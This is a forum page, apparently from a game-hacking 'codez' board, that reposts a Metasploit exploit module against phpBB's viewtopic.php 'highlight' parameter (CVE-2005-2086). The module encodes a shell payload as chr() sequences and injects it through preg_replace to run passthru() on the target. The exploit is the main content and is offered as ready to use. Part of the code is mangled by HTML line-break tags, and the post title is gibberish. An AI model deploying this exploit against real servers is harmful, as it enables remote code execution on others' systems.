##
# $Id: phpbb_highlight.rb 9671 2010-07-03 06:21:31Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#
http://metasploit.com/framework/##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'phpBB viewtopic.php Arbitrary Code Execution',
'Description' => %q{
This module exploits two arbitrary PHP code execution flaws in the
phpBB forum system. The problem is that the 'highlight' parameter
in the 'viewtopic.php' script is not verified properly and will
allow an attacker to inject arbitrary code via preg_replace().
This vulnerability was introduced in revision 3076, and finally
fixed in revision 5166. According to the "tags" within their tree,
this corresponds to versions 2.0.4 through 2.0.15 (inclusive).
},
'Author' => [ 'valsmith[at]metasploit.com', 'hdm', 'patrick' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 9671 $',
'References' =>
[
[ 'CVE', '2005-2086'],
[ 'CVE', '2004-1315'],
[ 'OSVDB', '11719'],
[ 'OSVDB', '17613'],
[ 'BID', '14086'],
[ 'BID', '10701'],
],
'Privileged' => false,
'Payload' =>
{
'DisableNops' => true,
'Space' => 1024,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl ruby bash telnet',
}
},
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Targets' =>
[
[ 'Automatic', { }],
[ 'phpbb <=2.0.10', { }],
[ 'phpbb <=2.0.15', { }],
],
'DisclosureDate' => 'Nov 12 2004',
'DefaultTarget' => 0))
register_options(
[
OptString.new('URI', [true, "The phpBB root Directory", "/phpBB2"]),
OptString.new('TOPIC', [false, "The ID of a valid topic"]),
], self.class)
end
def find_topic
1.upto(32) do |x|
res = send_request_raw({
'uri' => datastore['URI'] + '/viewtopic.php?topic=' + x.to_s,
}, 25)
if (res and res.body.match(/class="postdetails"/))
print_status("Discovered valid topic ID: #{x}")
return x
end
end
return false
end
def exploit
topic = datastore['TOPIC'] || find_topic
if !(topic)
print_status("No valid topic ID found, please specify the TOPIC option.")
return
else
sploit = datastore['URI'] + "/viewtopic.php?t=#{topic}&highlight="
case target.name
when /Automatic/
req = "/viewtopic.php?t=#{topic}&highlight=%2527%252ephpinfo()%252e%2527"
res = send_request_raw({
'uri' => datastore['URI'] + req
}, 25)
print_status("Trying to determine which attack method to use...")
if (res and res.body =~ /\
phpinfo/)<br /> byte = payload.encoded.unpack('C*').map! { |ch| ch = "chr(#{ch})" }.join('%252e')<br /> sploit << "%2527%252epassthru(#{byte})%252e%2527"<br /> else<br /> byte = payload.encoded.unpack('C*').map! { |ch| ch = "chr(#{ch})" }.join('.')<br /> sploit << "%27.passthru(#{byte}).%27"<br /> end<br /> when /2\.0\.10/<br /> byte = payload.encoded.unpack('C*').map! { |ch| ch = "chr(#{ch})" }.join('%252e')<br /> sploit << "%2527%252epassthru(#{byte})%252e%2527"<br /> when /2\.0\.15/<br /> byte = payload.encoded.unpack('C*').map! { |ch| ch = "chr(#{ch})" }.join('.')<br /> sploit << "%27.passthru(#{byte}).%27"<br /> end<br /> res = send_request_raw({<br /> 'uri' => sploit<br /> }, 25)<br /> end<br /> end<br />end<br /></div><div class="clear"></div></div><span class="gensmall"></span></td></tr><tr><td colspan="2"><div class="fa_like_div"><p class="fa_like_list" style="display: none;"></p><button class="rep-button " data-href="" data-href-rm=""><svg width="15px" height="15px" viewBox="0 0 1792 1792" xmlns="http://www.w3.org/2000/svg"><path d="M320 1344q0-26-19-45t-45-19q-27 0-45.5 19t-18.5 45q0 27 18.5 45.5t45.5 18.5q26 0 45-18.5t19-45.5zm160-512v640q0 26-19 45t-45 19h-288q-26 0-45-19t-19-45v-640q0-26 19-45t45-19h288q26 0 45 19t19 45zm1184 0q0 86-55 149 15 44 15 76 3 76-43 137 17 56 0 117-15 57-54 94 9 112-49 181-64 76-197 78h-129q-66 0-144-15.5t-121.5-29-120.5-39.5q-123-43-158-44-26-1-45-19.5t-19-44.5v-641q0-25 18-43.5t43-20.5q24-2 76-59t101-121q68-87 101-120 18-18 31-48t17.5-48.5 13.5-60.5q7-39 12.5-61t19.5-52 34-50q19-19 45-19 46 0 82.5 10.5t60 26 40 40.5 24 45 12 50 5 45 .5 39q0 38-9.5 76t-19 60-27.5 56q-3 6-10 18t-11 22-8 24h277q78 0 135 57t57 135z" fill="#666"/></svg><span>Like</span><span class="rep-nb" style="display:none;"></span></button><button class="rep-button " data-href="" data-href-rm=""><svg width="15px" height="15px" viewBox="0 0 1792 1792" xmlns="http://www.w3.org/2000/svg"><path d="M320 576q0 26-19 45t-45 19q-27 0-45.5-19t-18.5-45q0-27 18.5-45.5t45.5-18.5q26 0 45 18.5t19 45.5zm160 512v-640q0-26-19-45t-45-19h-288q-26 0-45 19t-19 45v640q0 26 19 45t45 19h288q26 0 45-19t19-45zm1129-149q55 61 55 149-1 78-57.5 135t-134.5 57h-277q4 14 8 24t11 22 10 18q18 37 27 57t19 58.5 10 76.5q0 24-.5 39t-5 45-12 50-24 45-40 40.5-60 26-82.5 10.5q-26 0-45-19-20-20-34-50t-19.5-52-12.5-61q-9-42-13.5-60.5t-17.5-48.5-31-48q-33-33-101-120-49-64-101-121t-76-59q-25-2-43-20.5t-18-43.5v-641q0-26 19-44.5t45-19.5q35-1 158-44 77-26 120.5-39.5t121.5-29 144-15.5h129q133 2 197 78 58 69 49 181 39 37 54 94 17 61 0 117 46 61 43 137 0 32-15 76z" fill="#666"/></svg><span>Dislike</span><span class="rep-nb" style="display:none;"></span></button></div></td></tr></table></td></tr><tr class="post--200" style=""><td class="row1 browse-arrows" align="center" valign="middle" width="150"><a href="#top"><img src="https://2img.net/s/t/13/82/29/i_up_arrow.gif" alt="Back to top" loading="lazy" /></a> <a href="#bottom"><img src="https://2img.net/s/t/13/82/29/i_down_arrow.gif" alt="Go down" loading="lazy" /></a></td><td class="row1 messaging gensmall" width="100%" height="28"><table border="0" cellspacing="0" cellpadding="0"><tr><td valign="middle"> <a href="https://huntercodez.forumotion.com" title="Visit poster's website" target="_blank" rel="nofollow"><img src="https://2img.net/i/fa/empty.gif" alt="https://huntercodez.forumotion.com" /></a> </td></tr></table></td></tr><tr align="right"><td class="catBottom" colspan="2" height="28"><table width="100%" border="0" cellspacing="0" cellpadding="0"><tr><td width="9%" class="noprint"> </td><td align="center" class="t-title"><a name="bottomtitle"></a><div class="cattitle">none hnfgngfn fn fgdg fg fg g gf</div></td><td align="right" nowrap="nowrap" width="9%" class="browse-arrows"><a href="#top"><img src="https://2img.net/s/t/13/82/29/i_up_arrow.gif" alt="Back to top" loading="lazy" /></a> </td></tr></table></td></tr></table><table class="forumline noprint" width="100%" border="0" cellspacing="0" cellpadding="0" style="margin: 0 0 1px 0; border-top: 0px;"><tr><td class="row2" valign="top" colspan="2" width="150"><span class="gensmall">Page <strong>1</strong> of <strong>1</strong></span></td></tr><tr><td class="row2" colspan="2" align="right" valign="top"><span class="gensmall"></span></td></tr></table><table class="forumline noprint" width="100%" border="0" cellspacing="0" cellpadding="0"><tr><td class="row2" colspan="2" align="center" style="padding:0px"><a name="quickreply"></a><br /></td></tr><tr><td style="margin:0; padding: 0;" colspan="2"><table border="0" cellpadding="0" width="100%" cellspacing="0" id="info_open" style="display:''"><tbody><tr><td class="row2" valign="top" width="25%"><span class="gensmall"><strong>Permissions in this forum:</strong></span></td><td class="row1" valign="top" width="75%"><span class="gensmall">You <strong>cannot</strong> reply to topics in this forum<br /></span></td></tr><tr><td class="catBottom" colspan="2" height="28"><table width="100%" border="0" cellspacing="0" cellpadding="0"><tr><td valign="middle" width="100%"><span class="nav"><a class="nav" href="/"></a><a class="nav" href=""></a> :: <a href="/c3-ftb3" class="nav"><span>FTB3</span></a> :: <a href="/f5-ftb3-codez" class="nav"><span>ftb3 codez</span></a></span></td><td align="right" valign="middle"><span class="gensmall"><a href="javascript:ShowHideLayer('info_open','info_close');"><img src="https://2img.net/s/t/13/82/29/i_tabs_less.gif" alt="-" align="middle" border="0" /></a></span></td></tr></table></td></tr></tbody></table></td></tr><tr><td style="margin:0; padding: 0;" colspan="2"><table border="0" cellpadding="0" cellspacing="0" width="100%" id="info_close" style="display:none;"><tbody><tr><td class="catBottom" colspan="2" height="28"><table width="100%" border="0" cellspacing="0" cellpadding="0"><tr><td valign="middle" width="100%"><span class="nav"><a class="nav" href="/"></a><a class="nav" href=""></a> :: <a href="/c3-ftb3" class="nav"><span>FTB3</span></a> :: <a href="/f5-ftb3-codez" class="nav"><span>ftb3 codez</span></a></span></td><td align="right" valign="middle"><span class="gensmall"><a href="javascript:ShowHideLayer('info_open','info_close');"><img src="https://2img.net/s/t/13/82/29/i_tabs_more.gif" alt="+" align="middle" border="0" /></a></span></td></tr></table></td></tr></tbody></table></td></tr></table><form action="/viewforum" method="get" name="jumpbox" onsubmit="if(document.jumpbox.f.value == -1){return false;}"><table class="noprint" width="100%" border="0" cellspacing="2" cellpadding="0" align="center"><tr><td align="left" valign="middle" nowrap="nowrap" ><span class="nav"></span></td><td align="right" nowrap="nowrap"><span class="gensmall">Jump to: <select name="selected_id" onchange="if(this.options[this.selectedIndex].value != -1){ forms['jumpbox'].submit() }"><option value="-1">Select a forum</option><option value="-1"></option><option value="-1">|</option><option tag="01" value="c1">|--Huntercodez</option><option tag="01" value="f1">| |--Site News</option><option tag="01" value="f20">| |--Indroduce your self to us!</option><option value="-1">| </option><option tag="01" value="c2">|--FTB2</option><option tag="01" value="f2">| |--FTB2 CODEZ</option><option tag="01" value="f3">| |--FTB2 PRX</option><option tag="01" value="f4">| |--FTB2 AMINATION</option><option value="-1">| </option><option tag="01" value="c3">|--FTB3</option><option tag="01" value="f5">| |--ftb3 codez</option><option tag="01" value="f6">| |--FTB3 PRXS</option><option value="-1">| </option><option tag="01" value="c4">|--Computer Game Hacks</option><option tag="01" value="f9">| |--Computer Game Hacks</option><option value="-1">| </option><option tag="01" value="c5">|--Resistance Codez</option><option tag="01" value="f10">| |--Resistance Codez</option><option tag="01" value="f11">| |--Resistance PRx</option><option value="-1">| </option><option tag="01" value="c6">|--Other Codez</option><option tag="01" value="f12">| |--Other Codez</option><option value="-1">| </option><option tag="01" value="c7">|--Tutorials</option><option tag="01" value="f13">| |--Tutorials</option><option value="-1">| </option><option tag="01" value="c8">|--Hitlist</option><option tag="01" value="f14">| |--Hitlist</option><option value="-1">| </option><option tag="01" value="c9">|--Affiliates</option><option tag="01" value="f15">| |--Affiliates Request</option><option value="-1">| </option><option tag="01" value="c10">|--PSP Downloads and Emulators</option><option tag="01" value="f16">| |--PSP Downloads and Emulators</option><option value="-1">| </option><option tag="01" value="f17">|--PSP Themes</option><option tag="01" value="c11">|--GFx</option><option tag="01" value="f18"> |--GFx</option><option tag="01" value="f19"> |--GFx Apps</option></select><input type="hidden" name="tid" value="4a53b9ff3b0b86e5e9800998ecf8427e" /> <input class="liteoption" type="submit" value="Go" /></span></td></tr></table></form><div id="b838e91" style="clear:both;"><div align="center"> <div style="text-align:center; display:inline-block; margin:0 auto;">
<table border="0" cellspacing="0" cellpadding="0" style="padding:0; margin:0; border:none;">
<tbody>
<tr>
<td valign="top" style="padding:32px 32px; "><div id="taboola-300x250-thumbnails-3" style="background-color:#fffd"></div><script type="text/javascript">window._taboola = window._taboola || [];_taboola.push({mode: "thumbnails-300x250",container: "taboola-300x250-thumbnails-3",placement: "300x250 Thumbnails-3",target_type: "mix"});</script></td>
<td valign="top" style="padding:32px 32px; "><div id="taboola-300x250-thumbnails-1" style="background-color:#fffd"></div><script type="text/javascript">window._taboola = window._taboola || [];_taboola.push({mode: "thumbnails-300x250",container: "taboola-300x250-thumbnails-1",placement: "300x250 Thumbnails-1",target_type: "mix"});</script></td>
</tr>
</tbody>
</table>
</div></div></div><div style="height:3px"></div></td><td valign="top" width="0"><div id="emptyidright"></div></td></tr></tbody></table></div></div><!--
close div id="page-body" --><div id="page-footer"><div align="center"><div class="gen"><strong><a href="https://www.forumotion.com/create-forum/phpbb3" target="_blank">Create a forum</a></strong> | <span class="gensmall">©</span><a href="https://www.forumotion.com/phpbb" target="_blank">phpBB</a> | <a name="bottom" href="https://help.forumotion.com/" target="_blank">Free forum support</a> | <a href="/abuse?page=%2Ft191-none-hnfgngfn-fn-fgdg-fg-fg-g-gf&report=1" rel="nofollow">Report an abuse</a> | <strong><a href="https://www.forumotion.com" target="_blank">Forumotion.com</a></strong></div></div></div></td></tr></table><script type="text/javascript">$(document).ready( function() {$('div.ti-connect').attr({'data-loc' : 'https://connect.topicit.net/','data-login' : 'https://huntercodez.forumotion.com/topicit/index.php/connect','data-version' : '1','data-lang' : 'en'});(function(d, s, id) {var js, fjs = d.getElementsByTagName(s)[0];if (d.getElementById(id)) return;js = d.createElement(s); js.id = id;js.src = "https://connect.topicit.net/scripts/connect.js";fjs.parentNode.insertBefore(js, fjs);}(document, 'script', 'topicit-connect'));});</script><script type="text/javascript">//<![CDATA[
fa_endpage();//]]></script><script type="text/javascript">
var vglnk = { key: '0d80ae9fe71cec9484f682bd59232f9e' };
(function(d, t) {
var s = d.createElement(t); s.type = 'text/javascript'; s.async = true;
s.src = '//cdn.viglink.com/api/vglnk.js';
var r = d.getElementsByTagName(t)[0]; r.parentNode.insertBefore(s, r);
}(document, 'script'));
</script> <div id="Forumactif_Video"></div>
<script type="application/javascript">
//<![CDATA[
var slmadshb = slmadshb || {};
slmadshb.que = slmadshb.que || [];
slmadshb.que.push(function() {
slmadshb.display("Forumactif_Video");
});
//]]>
</script> <script type="text/javascript">window._taboola = window._taboola || []; _taboola.push({flush: true});</script></body></html>
Subject: none hnfgngfn fn fgdg fg fg g gf 
Fri Mar 09, 2012 6:45 pm